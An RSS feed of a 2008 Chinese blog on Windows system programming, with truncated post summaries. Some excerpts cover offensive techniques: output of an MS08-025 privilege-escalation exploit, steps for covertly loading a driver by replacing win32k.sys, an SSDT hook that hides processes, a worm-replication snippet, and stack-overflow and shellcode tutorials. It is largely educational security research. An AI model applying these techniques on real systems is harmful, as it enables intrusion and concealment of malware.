﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>BlogJava-酒水不犯茶水-随笔分类-系统编程</title><link>http://www.blogjava.net/baicker/category/17621.html</link><description /><language>zh-cn</language><lastBuildDate>Fri, 09 May 2008 08:00:44 GMT</lastBuildDate><pubDate>Fri, 09 May 2008 08:00:44 GMT</pubDate><ttl>60</ttl><item><title>改了个linux下的c代码为windows版本</title><link>http://www.blogjava.net/baicker/archive/2008/05/09/199502.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 09 May 2008 06:51:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/05/09/199502.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/199502.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/05/09/199502.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/199502.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/199502.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>Windows的C++没有pthread_t类型，linux中有个pthread.h，很多站的VC代码，都不知道从哪包含来的，shit<br>网上看到有一个叫 POSIX Threads for Win32 的开源项目给出了一个功能比较完善的Windows下pthreads API的实现。<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/05/09/199502.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/199502.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-05-09 14:51 <a href="http://www.blogjava.net/baicker/archive/2008/05/09/199502.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>将Win32 C/C++应用程序迁移到Linux-进程、线程和共享内存（ZT）</title><link>http://www.blogjava.net/baicker/archive/2008/05/09/199491.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 09 May 2008 06:33:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/05/09/199491.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/199491.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/05/09/199491.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/199491.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/199491.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>本文的内容是 Win32 API（特别是进程、线程和共享内存服务）到 POWER 上 Linux 的映射。本文可以帮助您确定哪种映射服务最适合您的需要。作者向您详细介绍了他在移植 Win32 C/C++ 应用程序时遇到的 API 映射。<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/05/09/199491.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/199491.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-05-09 14:33 <a href="http://www.blogjava.net/baicker/archive/2008/05/09/199491.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>MS08-025 for win2k &amp; win2k3</title><link>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 17 Apr 2008 15:43:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/193889.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html#Feedback</comments><slash:comments>6</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/193889.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/193889.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)<br>D:\>ms08025 whoami<br><br>        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit<br>        By 009, baicker@hotmail.com<br>        TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1<br><br>Kernel is \WINNT\System32\ntoskrnl.exe<br>Get KernelBase Success, ntoskrnl.exe base = 80400000<br>Mapping ntoskrnl.exe ... ok<br>KeServiceDescriptorTable = 008ED280<br>Find KiServiceTable ... Get ZwVdmControl Number ... ok!<br>ZwVdmCo&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/04/17/193889.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/193889.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-04-17 23:43 <a href="http://www.blogjava.net/baicker/archive/2008/04/17/193889.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>用C++修改本地安全策略</title><link>http://www.blogjava.net/baicker/archive/2008/01/30/178511.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 30 Jan 2008 05:30:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/01/30/178511.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/178511.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/01/30/178511.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/178511.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/178511.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 要写个修改本地安全策略的工具，本以为修改注册表就行了，没想到还挺复杂，改策略，对应的注册表项会变，倒过来，改对应的注册表项，策略没变，郁闷<br>[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account]        |--------------------------------修改次数<br>"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\        00 ~ 22<br>  00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\        23 ~ 47<br>  00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\        48 ~ 72<br>  03,00,00,00,00,00,00,02,00,18,00,00,&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/01/30/178511.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/178511.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-01-30 13:30 <a href="http://www.blogjava.net/baicker/archive/2008/01/30/178511.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>新手编译驱动</title><link>http://www.blogjava.net/baicker/archive/2008/01/08/173671.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 08 Jan 2008 08:20:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/01/08/173671.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/173671.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/01/08/173671.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/173671.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/173671.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 网上找了N多资料,说得我晕头转向的,都是TMD资深顾问级别的文章,最后简单几步也可以搞定,过程如下:<br><br>我的SDK本来就是装好的,再装个DDK,就是重装系统,只要DDK目录还在,重新指定下即可,不用重装DDK<br>DDK目录为: f:\WINDDK\3790.1830<br><br>以下以HelloWorld为例<br>-----------------------------------------HelloWorld.h---------------------------------------------------<br>#ifndef __HELLOWORLD_H__<br>#define __HELLOWORLD_H__<br>#include <ntddk.h><br>.................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/01/08/173671.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/173671.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-01-08 16:20 <a href="http://www.blogjava.net/baicker/archive/2008/01/08/173671.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>简单认识Anti-RootKit(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 29 Dec 2007 07:09:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171547.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171547.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171547.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 现在RK（rootkit）和ARK(anti- rootkit)的斗争已经进行了很久，在印象中最早出来的ARK工具是冰刃(IceSword)，从冰刃开始出来到现在RK和ARK的斗争一直在继续，目前冰刃还是在流行当中，自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵，现在很多病毒木马已经广泛的带有驱动,使用一些RK的技术和方法使自己更底层些更强大些，当前流行的ARK工具主要包括：隐藏进程检测，内核驱动检测，SSDT检测，代码HOOK检测，注册表隐藏的检测，隐藏文件的检测等一些功能的，下面谈谈自己对一些功能的简单愚见 嘻嘻。<br>..........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/29/171547.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171547.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-29 15:09 <a href="http://www.blogjava.net/baicker/archive/2007/12/29/171547.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>无耻的驱动加载法(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 29 Dec 2007 06:59:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171537.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171537.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171537.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 方法一： 替换win32k.sys<br>在2k3的系统下ZwSetSystemInformation禁止了用户模式下加载驱动，只允许SMSS.exe加载win32k.sys。于是我们可以利用一下这个特点：<br>1. 注入SMSS.EXE<br>2. 打开SeLoadDriverPrivilege权限<br>3. 把原始的win32k.sys改名<br>4. 复制我们的驱动到\systemroot\system32下<br>5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys<br>6. 把\\SystemRoot\\System32\\win32k.sys改名<br>7. 把原始的win32k.sys文件改名改回去<br>..............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/29/171537.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171537.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-29 14:59 <a href="http://www.blogjava.net/baicker/archive/2007/12/29/171537.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>实例解析蠕虫病毒的原理(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:44:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171227.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171227.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171227.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 　　一、蠕虫病毒具有自我复制能力<br><br>　　我们以普通的VB脚本为例来看看： <br>JavaScript代码<br><br>   1. Set objFs=CreateObject ("Scripting.FileSystemObject")    <br>   2. '创建一个文件系统对象   <br>   3. objFs.CreateTextFile ("C:\virus.txt", 1)   <br>   4. '通过文件系统对象的方法创建了一个TXT文件。   <br>.....................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171227.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171227.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:44 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171227.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级shellcode_定位缓冲区](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:41:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171225.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171225.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171225.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 跟贴中看到已经有不少朋友成功的完成了前面的所有例题，今天我们在前面的基础上，继续深入。每一讲我都会引入一些新的知识和技术，但只有一点点，因为我希望在您读完贴之后就能立刻消化吸收，这是标准的循序渐进的案例式学习方法<br> <br>另外在今天开始之前，我顺便说一下后面的教学计划：<br> <br>我会再用3～4次的讲座来阐述shellcode技术，确保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用程序（exploit）<br>..........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171225.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171225.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:41 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171225.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出D_植入任意代码](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:40:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171222.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171222.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171222.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 麻雀虽小，五脏俱全<br><br>如果您顺利的学完了前面4讲的内容，并成功的完成了第2讲和第4讲中的实验，那么今天请跟我来一起挑战一下劫持有漏洞的进程，并向其植入恶意代码的实验，相信您成功完成这个实验后，学习的兴趣和自信心都会暴增。<br><br>开始之前，先简要的回答一下前几讲跟贴中提出的问题<br><br>代码编译少头文件问题：可能是个人习惯问题，哪怕几行长的程序我也会丢到project里去build，而不是用cl，所以没有注意细节。如果你们嫌麻烦，不如和我一样用project来build，应该没有问题的。否则的话，实验用的程序实在太简单了，这么一点小问题自己决绝吧。另外，看到几个同学说为了实验，专门恢复了古老的VC6.0，我也感动不已啊，呵呵。<br>...............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171222.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171222.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:40 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171222.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出C_修改程序流程](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:39:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171221.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171221.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171221.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 上节课没有操练滴东西，不少蠢蠢欲动的同学肯定已经坐不住了。悟空，不要猴急，下面的两堂课都是实践课，用来在实践中深入体会上节课中的知识，并且很有趣味性哦<br><br>  信息安全技术是一个对技术性要求极高的领域，除了扎实的计算机理论基础外、更重要的是优秀的动手实践能力。在我看来，不懂二进制就无从谈起安全技术。<br><br>  缓冲区溢出的概念我若干年前已经了然于胸，不就是淹个返回地址把CPU指到缓冲区的shellcode去么。然而当我开始动手实践的时候，才发现实际中的情况远远比原理复杂。<br>................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171221.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171221.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:39 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171221.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出B_系统栈原理](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171217.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:34:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171217.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171217.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171217.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171217.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171217.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 扫盲班第三讲开课啦！<br>上节课我们用越过数组边界的一个字节把邻接的标志变量修改成0，从而突破了密码验证程序。您实验成功了吗？没有的话回去做完实验在来听今天的课！<br><br>有几个同学反映编译器的问题，我还是建议用VC6.0，因为它build出来的PE最适合初学者领会概念。而且这门课动手很重要，基本上我的实验指导都是按VC6.0来写的，用别的build出来要是有点出入，实验不成功的话会损失学习积极性滴——实验获得的成就感是学习最好的动力。<br>............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171217.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171217.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:34 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171217.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出A_初识数组越界](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171215.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:33:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171215.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171215.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171215.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171215.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171215.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 本想来点大道理申明下研究思路啥的，看到大家的热情期待，稍微调整一下讲课的顺序。从今天开始，将用3～4次给大家做一下栈溢出的扫盲。<br><br>栈溢出的文章网上还是有不少的（其实优秀的也就两三篇），原理也不难，读过基本上就能够明白是怎么回事。本次讲解将主要集中在动手调试方面，更加着重实践。<br><br>经过这3～4次的栈溢出扫盲，我们的目标是：<br><br>领会栈溢出攻击的基本原理<br>能够动手调试简易的栈溢出漏洞程序，并能够利用漏洞执行任意代码（最简易的shellcode）<br>.............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171215.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171215.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:33 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171215.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[引子](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171213.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:32:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171213.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171213.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171213.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171213.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171213.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控？您的梦想是否曾经被书店里边满架子的反黑，防毒，擒木马的扫盲书强暴的体无完肤？<br> <br>从今天开始，准备陆续发一系列关于软件漏洞方面基础知识的帖子，包括软件漏洞的研究价值，研究方法，堆栈利用的基础知识，shellcode的调试方法，漏洞调试方法，漏洞分析，漏洞挖掘，软件安全性测试等等，此外还将介绍一些metasploit架构和fuzz测试方面的入门知识。<br> <br>软件漏洞分析，利用，发掘是当今安全技术界中流砥柱级别话题，如果您关注过black hat或者defcon之类的顶级安全技术峰会的话，就知道我不是在吹牛了。可惜的是这方面的中文资料很少，偶尔有一篇比较优秀的文章但又不够系统，目前为止也没有形成像破解技术这样的讨论风气，菜鸟们在黑灯瞎火的夜晚瞎折腾，没有交流和指导，兴趣就像被拔了气弥儿芯的车胎，很快就泄气了。<br> <br>虽然漏洞分析与利用与破解在技术上各有侧重点，但逆向基础是共同的。以我个人的经验，能做crack的朋友只要稍加进修就能入门。就算没有任何汇编基础和逆向经验的朋友也不用担心，因为这&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171213.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171213.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:32 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171213.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>对 Hook 内核ntoskrnl'sZwQuerySystemInformation隐藏任务管理器进程名 的一点完善(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/171009.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 14:12:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/171009.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171009.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/171009.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171009.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171009.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 通过hook ssdt中的ZwQuerySystemInformation来实现隐藏进程已经是很老的技术了。<br>qiweixue 在他的文章里面写的很清楚了:<br>http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B<br><br>不过他的文章里面，进程名字是直接写死的，不能通过三层进行传递，而且得到ZwQuerySystemInformation是通过汇编的方法，这样在其他系统上可能会有问题，所以我做了一些改善如下：<br>1 通过应用程序将进程名字传递进来，可以传递多个进程名字，格式为：qq.exe;taskmgr.exe;<br>2 通用的方法来得到ZwQuerySystemInformation的地址，不过这个方法都是从rookit上得来的。<br>...........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/171009.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171009.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 22:12 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/171009.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>让EXE导出函数(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/171007.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 14:11:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/171007.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171007.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/171007.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171007.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171007.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 偶然发现OllyDBG.exe导出了一堆函数，这些函数都是供其插件调用的。对这种体系结构很感<br>兴趣，想弄清楚它的实现原理。后来又看到梁肇新的书《编程高手箴言》第278页提到的调用<br>门，觉得都应该差不多。<br><br><br>三种不同的解决办法（原理可能是一样的，:)）：<br><br>1）在导出函数声明之前加上__declspec(dllexport)。例：<br>__declspec(dllexport) int Add(int a, int b);<br>__declspec(dllexport) int Sub(int a, int b);<br>__declspec(dllexport) int Mul(int a, int b);<br>__declspec(dllexport) int Div(int a, int b);<br>..........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/171007.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171007.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 22:11 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/171007.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>icesword 驱动部分分析(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/27/171004.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 27 Dec 2007 14:01:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/27/171004.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171004.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/27/171004.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171004.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171004.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: icesword.exe 在执行的时候会放出一个驱动程序 ispubdrv.sys .<br>icesword.exe 装载 这个驱动，这个驱动安装后就不会卸载。直到系统重新启动。这可能是因为驱动中调用了<br>PsSetCreateThreadNotifyRoutine 函数.下面是这个函数在 ddk 中的介绍。<br>........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/27/171004.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171004.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-27 22:01 <a href="http://www.blogjava.net/baicker/archive/2007/12/27/171004.html#Feedback" target="_blank" 